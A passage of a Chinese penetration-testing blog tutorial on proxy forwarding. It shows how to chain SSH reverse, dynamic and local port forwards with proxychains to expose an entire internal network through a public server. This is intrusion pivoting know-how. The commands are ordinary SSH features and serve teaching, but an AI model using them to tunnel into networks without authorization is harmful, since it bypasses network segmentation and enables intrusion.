内网渗透之代理转发(6)--内网环境代理到公网

下面开始进阶
上一小节我们成功的把内网的机子的22端口映射到公网上,那么我们可否把内网环境直接映射出来?
当然是可以的
还是老命令
在内网机器上执行

ssh -N -f -R 2222:0.0.0.0:8888 root@35.105.217.123

这里直接-N -f 这样执行完之后我们还在内网机子上
但是光这样不行
我们内网机子没有开8888端口
那么我们需要开启8888端口并且要把经过8888端口的流量转发到内网环境
这个时候用到-D命令
ssh -D 8888 root@127.0.0.1
在这里插入图片描述
可以看到我们内网机子开启了8888端口,并且会根据我们的需求把流经8888的流量转发到内网环境里,(因为我们远程的流量会转发到内网的8888,所以这里就算是127.0.0.1也没有关系)

接下来还要再公网机子上开启转发,(这是因为-R的缺陷,只会绑定在127.0.0.1)

ssh -L 0.0.0.0:2221:127.0.0.1:2222 root@localhost

接下来我们配置代理链
vim /etc/proxychains.conf
ip改成公网的ip,端口改成允许0.0.0.0访问的即公网转发过的端口
在这里插入图片描述
可以看到转发链成功
在这里插入图片描述
现在我们直接把整个内网映射了出来

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值